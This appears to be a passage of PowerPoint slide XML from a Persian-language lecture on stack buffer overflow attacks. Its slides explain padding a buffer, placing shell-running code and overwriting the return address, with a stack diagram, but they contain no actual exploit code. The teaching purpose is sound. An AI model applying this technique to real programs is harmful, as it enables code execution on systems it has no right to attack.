          <p:cNvPr id="22559" name="AutoShape 71"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="22532" idx="3"/>
            <a:endCxn id="22564" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1984375" y="3276600"/>
            <a:ext cx="4721225" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -12421"/>
              <a:gd name="adj2" fmla="val 915217"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22560" name="Text Box 72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="8153400" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بافر  را بواسطه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کدهاي بيهوده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنيد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و در ادامه کد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجراي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> را </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>وارد کنيد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آدرس </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بايد دقيق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>باشد وگرنه برنامه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>crash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميکند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>قسمت سخت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ترين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>قسمت کار است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22561" name="Text Box 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22562" name="Text Box 74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22563" name="Text Box 75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22564" name="Text Box 76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22565" name="Text Box 77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22566" name="Text Box 78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22567" name="Text Box 79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="0"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>کد مخرب را براي اجرا به برنامه بدهيد</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3124200"/>
            <a:ext cx="609600" cy="609600"/>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23557" name="Rectangle 1028"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3124200"/>
            <a:ext cx="609600" cy="609600"/>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23558" name="Text Box 1029"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="3733800"/>
            <a:ext cx="433708" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23559" name="Text Box 1030"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="3733800"/>
            <a:ext cx="454548" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23560" name="Rectangle 1031"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3124200"/>
            <a:ext cx="4038600" cy="609600"/>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23561" name="Text Box 1032"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3733800"/>
            <a:ext cx="721480" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23562" name="Text Box 1033"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7423944" y="3091656"/>
            <a:ext cx="2128838" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23563" name="Text Box 1034"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-619125" y="3209925"/>
            <a:ext cx="2517775" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23564" name="Text Box 1035"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23565" name="Text Box 1036"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23566" name="Text Box 1037"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23567" name="Text Box 1038"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23568" name="Text Box 1039"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23569" name="Text Box 1040"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23570" name="Text Box 1041"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23571" name="Text Box 1042"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23572" name="Text Box 1043"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
